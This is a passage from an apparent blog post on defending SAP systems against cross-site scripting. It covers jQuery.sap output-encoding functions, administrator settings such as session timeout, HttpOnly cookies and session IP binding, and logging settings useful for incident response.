JavaScriptjQuery.sap.encodeJS(sValue)
URLjQuery.sap.encodeURL(sValue)
CSSjQuery.sap.encodeCSS(sValue)

From the administrator’s perspective

 

The administrator has to set the parameters to improve security:

  • Global_app_config/session_config/sessionTimeout = 900. Enable session timeout to minimize potential attack window.
  • SystemCookiesDataProtection = true.  Declaring a cookie as HttpOnly increases the security of your system because it eliminates access to this cookie in the Web browser from client-side scripts, applets, plugins, and the like. Set httpOnly flag to secure cookies from transmitting them into the malicious host using XSS vulnerability.
  • ume.logon.httponlycookie= True. Logon tickets are cookies that are used for user authentication and Single Sign-On in J2EE Engine.  Value “True” means that the session information can be transmitted only by HTTP and obtaining of cookies using document.cookie (typical example of XSS attack) is not possible.
  • SessionIPProtectionEnabled = True. Specifies whether the session IP protection is enabled. When this property is set to true, the HTTP session cannot be accessed from different IPs. Only requests from the IP that started the session are processed.

From incident response perspective

 

To be able to identify the real attack happened because of the XSS vulnerability and also from some other web-based vulnerabilities, it is recommended to configure the following parameters.

  • LogCLF = TRUE in configuration file http.properties enables logging in CEF format.
  • ArchiveOldLogFiles = ON. The Log Configurator service provides an option for automatic archiving of log files. Logs are written into a set of files. When the last file is completed, the new logs start overwriting the old log files. If there is no archiving for access logs, all logs soon will be overwritten.
  • Enable Additional information logging [13].
  • HttpTrace= Enable. To enable HTTP Trace for more information run ConfigTool. Open the Properties tab of the HTTP Provider Service running on the dispatcher and assign the appropriate value to the HttpTrace property.

Actions

Filter Blog

By author:
By date:
By tag: